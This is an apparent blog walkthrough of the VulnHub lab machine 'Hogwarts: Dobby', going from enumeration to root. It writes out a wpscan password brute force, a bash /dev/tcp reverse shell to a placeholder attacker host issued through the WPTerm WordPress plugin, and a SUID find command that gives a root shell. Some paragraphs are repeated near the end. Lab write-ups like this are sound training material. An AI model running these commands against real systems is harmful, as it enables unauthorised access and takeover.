Hogwarts: Dobby is a machine from VulnHub that is rated as easy difficulty. The main goal here is to get the root flag and to have root access.
As always let's start with an nmap scan to discover the open ports.
Command: nmap -A $IP
Looks like that there is only one open port, port 80. We can see something interesting here, it looks like there are some credentials in the
http-title, where the password is base64 encoded. Let's decode that text.
Meh...I was expecting that, so let's move on. If we access the HTTP server, there is the default Apache template.
Always check the page source (especially in CTFs).
This looks like a HTTP directory so let's access it.
I got to be honest here, I don't understand this Harry Potter reference, so for me the message above not interesting.
The next step was to start a gobuster scan against the initial page on port 80.
Command: gobuster dir -u $IP -w /wordlist -x /extensions
We have a new directory. /log. This is new.
You might think that this is the actual password, but it is not, it is
base64 encoded. Now, if we decode it. we get:
Ok, now accessing the directory that was given to us as a hint. Here we have a wordpress (you can see if it is wordpress by checking the page source, it has a lot of words that start with
wp-) page.
Note: Before moving on, you can use wpscan to do some enumeration on the wordpress website.
The first port on the page might look like some gibberish, but actually is not. That "encoding" is called
brainfuck. I tried to decode that text but again it gave me nothing. The second post it's just some Harry Potter BS.
The next thing that I did was to find a Harry Potter wordlist from github and I started a password brute force against user Draco (we know who the user is because of the two posts on the page are made by him).
Now I used the following command for the brute force
Command: wpscan --url http://$IP/DiagonAlley -U Draco -P /harrypotter-2018.txt
And we have a password. Now we can login to wordpress.
There are many ways on getting a reverse shell from wordpress, but I chose to install a plugin called WPTerm which can be accessed here:
https://wordpress.org/plugins/wpterm/After you install the plugin you can execute commands on the actual host, as you can see below, where I executed a reverse shell command
Command: bash -c 'bash -i >& /dev/tcp/ATTACKER IP/PORT 0>&1'And now we have a shell on the machine as user
www-data Note: You will not be able to use cat on the machine to read files, so you can use less to do that.
If you remember from earlier we have password that we decoded from base64. That is the password for user dobby. Let's use it and let's get a shell as user
dobby.
Now I just used
linpeas to search for some privilege escalation factors, and I've found two.
Usually when a used is in the
lxd group, you can use it to privilege escalate, but I don't think that this is the intended way to do it, so I'll use the intended way (I hope is the intended way).
I think that
/usr/bin/find is the intended path to privilege escalate to root. To get a root shell just execute the following command that you can find it on
gtfobins.
Command: /usr/bin/find . -exec /bin/bash -p \; -quitAs you can see, our
euid (effective user id is set to 0(root)). Now you can read both user and root flags.
The first port on the page might look like some gibberish, but actually is not. That "encoding" is called brainfuck. I tried to decode that text but again it gave me nothing. The second post it's just some Harry Potter BS.
And now we have a shell on the machine as user www-data
As you can see, our euid (effective user id is set to 0(root)). Now you can read both user and root flags.
Comments
Post a Comment